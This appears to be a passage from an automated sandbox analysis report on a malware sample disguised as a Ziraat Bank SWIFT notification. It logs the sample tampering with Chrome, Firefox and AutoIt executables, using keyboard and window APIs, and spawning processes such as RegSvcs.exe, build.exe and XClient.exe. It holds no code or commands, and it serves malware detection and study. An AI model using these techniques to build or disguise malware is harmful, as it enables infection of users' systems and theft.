Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 3347968	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 3921484	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 3921408	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 1777084	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 6470144	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 7043660	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 7043584	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 2807964	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 6470144	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 7043660	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 7043584	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 2807964	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 1665536	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 2239052	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 2238976	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 853340	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 1861120	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 2434636	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 2434560	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 910188	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1445888	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 2019404	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 2019328	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 728892	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 248832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 121980	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 707072	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280588	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 346881	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 666112	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239628	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239552	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 193089	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 228352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801868	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801792	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 43297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 762368	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335884	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335808	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 239297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 70144	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643660	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643584	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 32241	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 279040	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852556	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852480	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 111633	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 55296	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628812	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628736	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 4108	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 403968	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977484	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977408	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 79009	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 224256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797772	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797696	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 35826	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_004048D7
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00485376

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

0_2_00423187

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
